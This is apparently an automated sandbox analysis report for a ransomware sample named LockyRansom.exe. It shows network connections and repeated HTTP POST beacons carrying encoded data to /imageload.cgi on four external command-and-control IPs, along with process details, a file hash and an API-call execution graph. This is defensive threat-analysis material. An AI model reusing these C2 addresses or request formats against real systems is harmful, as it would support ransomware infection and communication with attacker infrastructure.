May 23, 2024 01:13:30.803800106 CEST4970480192.168.2.7185.179.190.31
May 23, 2024 01:13:30.809298038 CEST8049704185.179.190.31192.168.2.7
May 23, 2024 01:13:30.809405088 CEST4970480192.168.2.7185.179.190.31
May 23, 2024 01:13:30.810314894 CEST4970480192.168.2.7185.179.190.31
May 23, 2024 01:13:30.810343981 CEST4970480192.168.2.7185.179.190.31
May 23, 2024 01:13:30.865405083 CEST8049704185.179.190.31192.168.2.7
May 23, 2024 01:13:30.915318012 CEST8049704185.179.190.31192.168.2.7
May 23, 2024 01:13:52.199529886 CEST8049704185.179.190.31192.168.2.7
May 23, 2024 01:13:52.199759007 CEST4970480192.168.2.7185.179.190.31
May 23, 2024 01:13:52.200572968 CEST4970480192.168.2.7185.179.190.31
May 23, 2024 01:13:52.202433109 CEST4970580192.168.2.737.143.9.154
May 23, 2024 01:13:52.253406048 CEST8049704185.179.190.31192.168.2.7
May 23, 2024 01:13:52.299529076 CEST804970537.143.9.154192.168.2.7
May 23, 2024 01:13:52.299807072 CEST4970580192.168.2.737.143.9.154
May 23, 2024 01:13:52.300122023 CEST4970580192.168.2.737.143.9.154
May 23, 2024 01:13:52.300122976 CEST4970580192.168.2.737.143.9.154
May 23, 2024 01:13:52.353425026 CEST804970537.143.9.154192.168.2.7
May 23, 2024 01:13:52.399514914 CEST804970537.143.9.154192.168.2.7
May 23, 2024 01:13:53.120646000 CEST804970537.143.9.154192.168.2.7
May 23, 2024 01:13:53.120884895 CEST4970580192.168.2.737.143.9.154
May 23, 2024 01:13:53.121176958 CEST4970580192.168.2.737.143.9.154
May 23, 2024 01:13:53.121211052 CEST4970580192.168.2.737.143.9.154
May 23, 2024 01:13:53.122760057 CEST4970680192.168.2.746.17.44.153
May 23, 2024 01:13:53.126065016 CEST804970537.143.9.154192.168.2.7
May 23, 2024 01:13:53.126097918 CEST804970537.143.9.154192.168.2.7
May 23, 2024 01:13:53.126136065 CEST4970580192.168.2.737.143.9.154
May 23, 2024 01:13:53.126178980 CEST4970580192.168.2.737.143.9.154
May 23, 2024 01:13:53.173387051 CEST804970537.143.9.154192.168.2.7
May 23, 2024 01:13:53.173538923 CEST4970580192.168.2.737.143.9.154
May 23, 2024 01:13:53.178014040 CEST804970646.17.44.153192.168.2.7
May 23, 2024 01:13:53.178118944 CEST4970680192.168.2.746.17.44.153
May 23, 2024 01:13:53.178350925 CEST4970680192.168.2.746.17.44.153
May 23, 2024 01:13:53.178380013 CEST4970680192.168.2.746.17.44.153
May 23, 2024 01:13:53.225675106 CEST804970646.17.44.153192.168.2.7
May 23, 2024 01:13:53.271348953 CEST804970646.17.44.153192.168.2.7
May 23, 2024 01:14:14.586029053 CEST804970646.17.44.153192.168.2.7
May 23, 2024 01:14:14.586332083 CEST4970680192.168.2.746.17.44.153
May 23, 2024 01:14:14.586779118 CEST4970680192.168.2.746.17.44.153
May 23, 2024 01:14:14.589165926 CEST4970880192.168.2.746.183.165.45
May 23, 2024 01:14:14.596303940 CEST804970646.17.44.153192.168.2.7
May 23, 2024 01:14:14.647488117 CEST804970846.183.165.45192.168.2.7
May 23, 2024 01:14:14.647655964 CEST4970880192.168.2.746.183.165.45
May 23, 2024 01:14:14.647859097 CEST4970880192.168.2.746.183.165.45
May 23, 2024 01:14:14.647880077 CEST4970880192.168.2.746.183.165.45
May 23, 2024 01:14:14.701381922 CEST804970846.183.165.45192.168.2.7
May 23, 2024 01:14:14.747514963 CEST804970846.183.165.45192.168.2.7
May 23, 2024 01:14:36.086546898 CEST804970846.183.165.45192.168.2.7
May 23, 2024 01:14:36.086848021 CEST4970880192.168.2.746.183.165.45
May 23, 2024 01:14:36.087313890 CEST4970880192.168.2.746.183.165.45
May 23, 2024 01:14:36.094095945 CEST4970980192.168.2.7185.179.190.31
May 23, 2024 01:14:36.097479105 CEST804970846.183.165.45192.168.2.7
May 23, 2024 01:14:36.143347979 CEST8049709185.179.190.31192.168.2.7
May 23, 2024 01:14:36.143445969 CEST4970980192.168.2.7185.179.190.31
May 23, 2024 01:14:36.143686056 CEST4970980192.168.2.7185.179.190.31
May 23, 2024 01:14:36.143735886 CEST4970980192.168.2.7185.179.190.31
May 23, 2024 01:14:36.193267107 CEST8049709185.179.190.31192.168.2.7
May 23, 2024 01:14:36.239310980 CEST8049709185.179.190.31192.168.2.7
May 23, 2024 01:14:57.544363976 CEST8049709185.179.190.31192.168.2.7
May 23, 2024 01:14:57.544466972 CEST4970980192.168.2.7185.179.190.31
May 23, 2024 01:14:57.544642925 CEST4970980192.168.2.7185.179.190.31
May 23, 2024 01:14:57.546190977 CEST4971080192.168.2.737.143.9.154
May 23, 2024 01:14:57.554361105 CEST8049709185.179.190.31192.168.2.7
May 23, 2024 01:14:57.599268913 CEST804971037.143.9.154192.168.2.7
May 23, 2024 01:14:57.599383116 CEST4971080192.168.2.737.143.9.154
May 23, 2024 01:14:57.599658012 CEST4971080192.168.2.737.143.9.154
May 23, 2024 01:14:57.599693060 CEST4971080192.168.2.737.143.9.154
May 23, 2024 01:14:57.649346113 CEST804971037.143.9.154192.168.2.7
May 23, 2024 01:14:57.696218014 CEST804971037.143.9.154192.168.2.7
May 23, 2024 01:14:58.379328012 CEST804971037.143.9.154192.168.2.7
May 23, 2024 01:14:58.379419088 CEST4971080192.168.2.737.143.9.154
May 23, 2024 01:14:58.379585981 CEST4971080192.168.2.737.143.9.154
May 23, 2024 01:14:58.379615068 CEST4971080192.168.2.737.143.9.154
May 23, 2024 01:14:58.380893946 CEST4971180192.168.2.746.17.44.153
May 23, 2024 01:14:58.386002064 CEST804971037.143.9.154192.168.2.7
May 23, 2024 01:14:58.386013031 CEST804971037.143.9.154192.168.2.7
May 23, 2024 01:14:58.386066914 CEST4971080192.168.2.737.143.9.154
May 23, 2024 01:14:58.386066914 CEST4971080192.168.2.737.143.9.154
May 23, 2024 01:14:58.394542933 CEST804971037.143.9.154192.168.2.7
May 23, 2024 01:14:58.394776106 CEST4971080192.168.2.737.143.9.154
May 23, 2024 01:14:58.401979923 CEST804971146.17.44.153192.168.2.7
May 23, 2024 01:14:58.402061939 CEST4971180192.168.2.746.17.44.153
May 23, 2024 01:14:58.402198076 CEST4971180192.168.2.746.17.44.153
May 23, 2024 01:14:58.402218103 CEST4971180192.168.2.746.17.44.153
May 23, 2024 01:14:58.463649035 CEST804971146.17.44.153192.168.2.7
May 23, 2024 01:14:58.512361050 CEST804971146.17.44.153192.168.2.7
  • 185.179.190.31
  • 37.143.9.154
  • 46.17.44.153
  • 46.183.165.45
Session IDSource IPSource PortDestination IPDestination PortPIDProcess
0192.168.2.749704185.179.190.31806924C:\Users\user\Desktop\LockyRansom.exe
TimestampBytes transferredDirectionData
May 23, 2024 01:13:30.810314894 CEST473OUTPOST /imageload.cgi HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://185.179.190.31/
x-requested-with: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 185.179.190.31
Content-Length: 613
Connection: Keep-Alive
May 23, 2024 01:13:30.810343981 CEST613OUTData Raw: 6b 4b 45 76 3d 31 25 46 41 25 31 39 25 39 30 25 38 39 25 45 36 25 44 31 25 41 34 69 59 25 45 30 25 46 45 25 30 43 25 31 32 25 41 37 25 39 38 25 43 33 63 56 6d 25 32 42 25 43 42 25 39 41 25 34 30 25 45 41 25 32 33 25 45 32 26 79 6a 6c 42 4f 73 3d
Data Ascii: kKEv=1%FA%19%90%89%E6%D1%A4iY%E0%FE%0C%12%A7%98%C3cVm%2B%CB%9A%40%EA%23%E2&yjlBOs=l%82%F8%E9%2B%2C%DE6%A6%A7m%F9%A78%07It+C%96%95%E1%3FR%C1%1E%8FZ%0Bf%60&KhBU=%0F%B1M%9B%12h%7Cn9%9E%80j8%00%98%7C%FF%A8%04%CC%D7%B1z.%7E%1B6%1A%CB&qun=%09%E5%90+


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
1192.168.2.74970537.143.9.154806924C:\Users\user\Desktop\LockyRansom.exe
TimestampBytes transferredDirectionData
May 23, 2024 01:13:52.300122023 CEST469OUTPOST /imageload.cgi HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://37.143.9.154/
x-requested-with: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 37.143.9.154
Content-Length: 613
Connection: Keep-Alive
May 23, 2024 01:13:52.300122976 CEST613OUTData Raw: 6b 4b 45 76 3d 31 25 46 41 25 31 39 25 39 30 25 38 39 25 45 36 25 44 31 25 41 34 69 59 25 45 30 25 46 45 25 30 43 25 31 32 25 41 37 25 39 38 25 43 33 63 56 6d 25 32 42 25 43 42 25 39 41 25 34 30 25 45 41 25 32 33 25 45 32 26 79 6a 6c 42 4f 73 3d
Data Ascii: kKEv=1%FA%19%90%89%E6%D1%A4iY%E0%FE%0C%12%A7%98%C3cVm%2B%CB%9A%40%EA%23%E2&yjlBOs=l%82%F8%E9%2B%2C%DE6%A6%A7m%F9%A78%07It+C%96%95%E1%3FR%C1%1E%8FZ%0Bf%60&KhBU=%0F%B1M%9B%12h%7Cn9%9E%80j8%00%98%7C%FF%A8%04%CC%D7%B1z.%7E%1B6%1A%CB&qun=%09%E5%90+
May 23, 2024 01:13:53.120646000 CEST1236INHTTP/1.0 403 Access Forbidden
Date: Wed, 22 May 2024 23:13:52 GMT
Server: Apache/2.4.37 (AlmaLinux) OpenSSL/1.1.1k mod_fcgid/2.3.9 PHP/7.2.24
X-Powered-By: PHP/7.2.24
Content-Length: 2011
Connection: close
Content-Type: text/html; charset=UTF-8
Data Raw: 20 20 20 20 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 20 31 30 30 25 3b 22 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 38 30 30 70 78 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 3e 20 64 69 76 20 3e 20 64 69 76 20 3e 20 64 69 76 20 64 69 76 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 72 69 67 [TRUNCATED]
Data Ascii: <!DOCTYPE html> <html style="height: 100%;"> <head> <meta charset="UTF-8"> <title>403 Access Forbidden</title> <style> @media screen and (max-width: 800px) { body > div > div > div div { display: block !important; padding-right: 0 !important; } body { text-align: center !important; } } </style> </head> <body style="height: 90%;"> <div style="display: flex; align-items: center; justify-content: center; height: 90%;"> <div style="background-color: #eee; width: 70%; border: solid 3px #ddd; padding: 1.5em 3em 3em 3em; font-family: Arial, Helvetica, sans-serif;"> <div style="display: table-row;"> <div style="display: table-cell; font-size: 150px; color: red; vertical-align: top; padding-right: 50px;">
May 23, 2024 01:13:53.126065016 CEST1029INData Raw: 20 20 20 20 20 20 20 20 26 23 39 39 39 35 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 74 61 62 6c
Data Ascii: &#9995; </div> <div style="display: table-cell; vertical-align: top;"> <h1 style="margin-top: 0;">We're sorry, you are not allowed to proceed</h1> <p>Your requ


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
2192.168.2.74970646.17.44.153806924C:\Users\user\Desktop\LockyRansom.exe
TimestampBytes transferredDirectionData
May 23, 2024 01:13:53.178350925 CEST469OUTPOST /imageload.cgi HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://46.17.44.153/
x-requested-with: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 46.17.44.153
Content-Length: 613
Connection: Keep-Alive
May 23, 2024 01:13:53.178380013 CEST613OUTData Raw: 6b 4b 45 76 3d 31 25 46 41 25 31 39 25 39 30 25 38 39 25 45 36 25 44 31 25 41 34 69 59 25 45 30 25 46 45 25 30 43 25 31 32 25 41 37 25 39 38 25 43 33 63 56 6d 25 32 42 25 43 42 25 39 41 25 34 30 25 45 41 25 32 33 25 45 32 26 79 6a 6c 42 4f 73 3d
Data Ascii: kKEv=1%FA%19%90%89%E6%D1%A4iY%E0%FE%0C%12%A7%98%C3cVm%2B%CB%9A%40%EA%23%E2&yjlBOs=l%82%F8%E9%2B%2C%DE6%A6%A7m%F9%A78%07It+C%96%95%E1%3FR%C1%1E%8FZ%0Bf%60&KhBU=%0F%B1M%9B%12h%7Cn9%9E%80j8%00%98%7C%FF%A8%04%CC%D7%B1z.%7E%1B6%1A%CB&qun=%09%E5%90+


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
3192.168.2.74970846.183.165.45806924C:\Users\user\Desktop\LockyRansom.exe
TimestampBytes transferredDirectionData
May 23, 2024 01:14:14.647859097 CEST471OUTPOST /imageload.cgi HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://46.183.165.45/
x-requested-with: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 46.183.165.45
Content-Length: 613
Connection: Keep-Alive
May 23, 2024 01:14:14.647880077 CEST613OUTData Raw: 6b 4b 45 76 3d 31 25 46 41 25 31 39 25 39 30 25 38 39 25 45 36 25 44 31 25 41 34 69 59 25 45 30 25 46 45 25 30 43 25 31 32 25 41 37 25 39 38 25 43 33 63 56 6d 25 32 42 25 43 42 25 39 41 25 34 30 25 45 41 25 32 33 25 45 32 26 79 6a 6c 42 4f 73 3d
Data Ascii: kKEv=1%FA%19%90%89%E6%D1%A4iY%E0%FE%0C%12%A7%98%C3cVm%2B%CB%9A%40%EA%23%E2&yjlBOs=l%82%F8%E9%2B%2C%DE6%A6%A7m%F9%A78%07It+C%96%95%E1%3FR%C1%1E%8FZ%0Bf%60&KhBU=%0F%B1M%9B%12h%7Cn9%9E%80j8%00%98%7C%FF%A8%04%CC%D7%B1z.%7E%1B6%1A%CB&qun=%09%E5%90+


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
4192.168.2.749709185.179.190.31806924C:\Users\user\Desktop\LockyRansom.exe
TimestampBytes transferredDirectionData
May 23, 2024 01:14:36.143686056 CEST473OUTPOST /imageload.cgi HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://185.179.190.31/
x-requested-with: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 185.179.190.31
Content-Length: 613
Connection: Keep-Alive
May 23, 2024 01:14:36.143735886 CEST613OUTData Raw: 6b 4b 45 76 3d 31 25 46 41 25 31 39 25 39 30 25 38 39 25 45 36 25 44 31 25 41 34 69 59 25 45 30 25 46 45 25 30 43 25 31 32 25 41 37 25 39 38 25 43 33 63 56 6d 25 32 42 25 43 42 25 39 41 25 34 30 25 45 41 25 32 33 25 45 32 26 79 6a 6c 42 4f 73 3d
Data Ascii: kKEv=1%FA%19%90%89%E6%D1%A4iY%E0%FE%0C%12%A7%98%C3cVm%2B%CB%9A%40%EA%23%E2&yjlBOs=l%82%F8%E9%2B%2C%DE6%A6%A7m%F9%A78%07It+C%96%95%E1%3FR%C1%1E%8FZ%0Bf%60&KhBU=%0F%B1M%9B%12h%7Cn9%9E%80j8%00%98%7C%FF%A8%04%CC%D7%B1z.%7E%1B6%1A%CB&qun=%09%E5%90+


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
5192.168.2.74971037.143.9.154806924C:\Users\user\Desktop\LockyRansom.exe
TimestampBytes transferredDirectionData
May 23, 2024 01:14:57.599658012 CEST469OUTPOST /imageload.cgi HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://37.143.9.154/
x-requested-with: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 37.143.9.154
Content-Length: 613
Connection: Keep-Alive
May 23, 2024 01:14:57.599693060 CEST613OUTData Raw: 6b 4b 45 76 3d 31 25 46 41 25 31 39 25 39 30 25 38 39 25 45 36 25 44 31 25 41 34 69 59 25 45 30 25 46 45 25 30 43 25 31 32 25 41 37 25 39 38 25 43 33 63 56 6d 25 32 42 25 43 42 25 39 41 25 34 30 25 45 41 25 32 33 25 45 32 26 79 6a 6c 42 4f 73 3d
Data Ascii: kKEv=1%FA%19%90%89%E6%D1%A4iY%E0%FE%0C%12%A7%98%C3cVm%2B%CB%9A%40%EA%23%E2&yjlBOs=l%82%F8%E9%2B%2C%DE6%A6%A7m%F9%A78%07It+C%96%95%E1%3FR%C1%1E%8FZ%0Bf%60&KhBU=%0F%B1M%9B%12h%7Cn9%9E%80j8%00%98%7C%FF%A8%04%CC%D7%B1z.%7E%1B6%1A%CB&qun=%09%E5%90+
May 23, 2024 01:14:58.379328012 CEST1236INHTTP/1.0 403 Access Forbidden
Date: Wed, 22 May 2024 23:14:58 GMT
Server: Apache/2.4.37 (AlmaLinux) OpenSSL/1.1.1k mod_fcgid/2.3.9 PHP/7.2.24
X-Powered-By: PHP/7.2.24
Content-Length: 2011
Connection: close
Content-Type: text/html; charset=UTF-8
Data Raw: 20 20 20 20 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 20 31 30 30 25 3b 22 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 38 30 30 70 78 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 3e 20 64 69 76 20 3e 20 64 69 76 20 3e 20 64 69 76 20 64 69 76 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 72 69 67 [TRUNCATED]
Data Ascii: <!DOCTYPE html> <html style="height: 100%;"> <head> <meta charset="UTF-8"> <title>403 Access Forbidden</title> <style> @media screen and (max-width: 800px) { body > div > div > div div { display: block !important; padding-right: 0 !important; } body { text-align: center !important; } } </style> </head> <body style="height: 90%;"> <div style="display: flex; align-items: center; justify-content: center; height: 90%;"> <div style="background-color: #eee; width: 70%; border: solid 3px #ddd; padding: 1.5em 3em 3em 3em; font-family: Arial, Helvetica, sans-serif;"> <div style="display: table-row;"> <div style="display: table-cell; font-size: 150px; color: red; vertical-align: top; padding-right: 50px;">
May 23, 2024 01:14:58.386002064 CEST1029INData Raw: 20 20 20 20 20 20 20 20 26 23 39 39 39 35 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 74 61 62 6c
Data Ascii: &#9995; </div> <div style="display: table-cell; vertical-align: top;"> <h1 style="margin-top: 0;">We're sorry, you are not allowed to proceed</h1> <p>Your requ


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
6192.168.2.74971146.17.44.153806924C:\Users\user\Desktop\LockyRansom.exe
TimestampBytes transferredDirectionData
May 23, 2024 01:14:58.402198076 CEST469OUTPOST /imageload.cgi HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://46.17.44.153/
x-requested-with: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 46.17.44.153
Content-Length: 613
Connection: Keep-Alive
May 23, 2024 01:14:58.402218103 CEST613OUTData Raw: 6b 4b 45 76 3d 31 25 46 41 25 31 39 25 39 30 25 38 39 25 45 36 25 44 31 25 41 34 69 59 25 45 30 25 46 45 25 30 43 25 31 32 25 41 37 25 39 38 25 43 33 63 56 6d 25 32 42 25 43 42 25 39 41 25 34 30 25 45 41 25 32 33 25 45 32 26 79 6a 6c 42 4f 73 3d
Data Ascii: kKEv=1%FA%19%90%89%E6%D1%A4iY%E0%FE%0C%12%A7%98%C3cVm%2B%CB%9A%40%EA%23%E2&yjlBOs=l%82%F8%E9%2B%2C%DE6%A6%A7m%F9%A78%07It+C%96%95%E1%3FR%C1%1E%8FZ%0Bf%60&KhBU=%0F%B1M%9B%12h%7Cn9%9E%80j8%00%98%7C%FF%A8%04%CC%D7%B1z.%7E%1B6%1A%CB&qun=%09%E5%90+


Click to jump to process

Click to jump to process

Target ID:0
Start time:19:12:59
Start date:22/05/2024
Path:C:\Users\user\Desktop\LockyRansom.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\Desktop\LockyRansom.exe"
Imagebase:0x400000
File size:614'400 bytes
MD5 hash:1720B1748AD7B8AC0BFC1C3636FEAD95
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low
Has exited:false

Reset < >

    Execution Graph

    Execution Coverage:1.4%
    Dynamic/Decrypted Code Coverage:100%
    Signature Coverage:16.9%
    Total number of Nodes:177
    Total number of Limit Nodes:12
    execution_graph 29921 415310 29922 415313 CryptAcquireContextA 29921->29922 29924 41531e 29922->29924 29925 415328 GetLastError 29924->29925 29926 41534f 29924->29926 29927 415322 29925->29927 29929 401946 29927->29929 29930 40197b KiUserExceptionDispatcher 29929->29930 29931 40196f 29929->29931 29930->29926 29931->29930 29932 5c007e 29950 5c0605 29932->29950 29934 5c0083 29954 5c05ef VirtualAlloc 29934->29954 29936 5c0093 29937 5c00a4 VirtualProtect VirtualProtect 29936->29937 29941 5c00dc 29937->29941 29938 5c012c 29956 5c01f3 29938->29956 29939 5c00f3 VirtualProtect 29939->29941 29942 5c0122 VirtualProtect 29939->29942 29941->29938 29941->29939 29941->29942 29942->29941 29943 5c0136 29944 5c0187 VirtualFree 29943->29944 29945 5c018f 29944->29945 29963 5c03ee VirtualAlloc 29945->29963 29947 5c019e 29948 5c0605 VirtualAlloc 29947->29948 29949 5c01a5 29948->29949 29952 5c05d9 29950->29952 29951 5c05f5 VirtualAlloc 29953 5c0601 29951->29953 29952->29951 29952->29953 29953->29934 29955 5c0601 29954->29955 29955->29936 29957 5c0276 29956->29957 29958 5c0203 29956->29958 29957->29943 29958->29957 29959 5c0216 LoadLibraryA 29958->29959 29960 5c0228 VirtualProtect 29958->29960 29961 5c0265 VirtualProtect 29958->29961 29962 5c0255 GetProcAddress 29958->29962 29959->29958 29960->29958 29961->29958 29962->29958 29963->29947 29964 4014b4 29967 403986 29964->29967 29975 403c2b 29967->29975 29970 4039d7 29974 4014da 29970->29974 30019 402e74 46 API calls 4 library calls 29970->30019 29971 4039fa 29971->29974 29980 4035f4 29971->29980 30020 403bb2 GetLastError 29975->30020 29977 403993 29977->29970 29977->29971 29977->29974 29978 403c33 29978->29977 30033 4046a1 46 API calls 3 library calls 29978->30033 29981 403613 29980->29981 29983 40362d 29981->29983 30057 403f3b 46 API calls 2 library calls 29981->30057 29989 403c2b __getptd 46 API calls 29983->29989 30016 40370c FindHandler type_info::operator== ___TypeMatch 29983->30016 29984 403935 30067 4034ed 47 API calls 5 library calls 29984->30067 29985 403c2b __getptd 46 API calls 29988 403956 29985->29988 29991 403964 29988->29991 30068 403f3b 46 API calls 2 library calls 29988->30068 29992 403674 29989->29992 29990 40394e 29990->29985 29991->29974 29992->29991 29995 403c2b __getptd 46 API calls 29992->29995 29997 403686 29995->29997 29998 403c2b __getptd 46 API calls 29997->29998 30001 403694 FindHandler 29998->30001 29999 401946 __CxxThrowException@8 KiUserExceptionDispatcher 29999->30016 30005 4036b0 30001->30005 30058 403f3b 46 API calls 2 library calls 30001->30058 30003 4036da 30004 403c2b __getptd 46 API calls 30003->30004 30006 4036df 30004->30006 30005->30003 30059 403f3b 46 API calls 2 library calls 30005->30059 30010 403c2b __getptd 46 API calls 30006->30010 30006->30016 30008 403c2b 46 API calls __getptd 30008->30016 30011 4036f1 30010->30011 30012 403c2b __getptd 46 API calls 30011->30012 30013 4036fc 30012->30013 30060 403013 46 API calls 2 library calls 30013->30060 30016->29984 30016->29990 30016->29999 30016->30008 30041 401693 30016->30041 30047 40347f 30016->30047 30061 403eef 46 API calls 3 library calls 30016->30061 30062 401893 46 API calls std::exception::_Copy_str 30016->30062 30063 403013 46 API calls 2 library calls 30016->30063 30064 401460 RtlUnwind 30016->30064 30065 402e74 46 API calls 4 library calls 30016->30065 30066 403089 47 API calls 5 library calls 30016->30066 30019->29974 30034 403a8d TlsGetValue 30020->30034 30023 403bd1 30038 404307 46 API calls __calloc_crt 30023->30038 30024 403c1f SetLastError 30024->29978 30026 403bdd 30026->30024 30027 403c16 30026->30027 30028 403bfe 30026->30028 30040 40267d 46 API calls 2 library calls 30027->30040 30039 403afe 46 API calls 4 library calls 30028->30039 30031 403c06 GetCurrentThreadId 30031->30024 30032 403c1c 30032->30024 30035 403aa2 TlsSetValue 30034->30035 30036 403abd 30034->30036 30035->30036 30036->30023 30036->30024 30038->30026 30039->30031 30040->30032 30043 4016ac 30041->30043 30042 4016e0 30044 4016f9 30042->30044 30070 403f3b 46 API calls 2 library calls 30042->30070 30043->30042 30069 403f3b 46 API calls 2 library calls 30043->30069 30044->30016 30048 403497 30047->30048 30049 40348a 30047->30049 30071 401460 RtlUnwind 30048->30071 30072 4033ed 46 API calls 3 library calls 30049->30072 30052 4034ae 30073 402e74 46 API calls 4 library calls 30052->30073 30054 4034bc 30074 4030d2 46 API calls 5 library calls 30054->30074 30056 4034dd FindHandler 30056->30016 30060->30016 30061->30016 30062->30016 30063->30016 30064->30016 30065->30016 30067->29990 30071->30052 30072->30048 30073->30054 30074->30056 30075 419717 30076 419808 SetEntriesInAclA 30075->30076 30077 4199c5 30076->30077 30078 4221db 30079 4223e0 DsRoleGetPrimaryDomainInformation 30078->30079 30081 690000 30082 69000a 30081->30082 30083 690030 30082->30083 30084 690054 VirtualAlloc 30082->30084 30085 402b0a 30135 4046c0 30085->30135 30087 402b16 GetStartupInfoW 30088 402b2a HeapSetInformation 30087->30088 30089 402b35 30087->30089 30088->30089 30136 405823 HeapCreate 30089->30136 30091 402b83 30092 402b8e 30091->30092 30148 402ae1 46 API calls 3 library calls 30091->30148 30149 403d74 58 API calls 4 library calls 30092->30149 30095 402b94 30096 402ba0 __RTC_Initialize 30095->30096 30097 402b98 30095->30097 30137 406487 53 API calls __calloc_crt 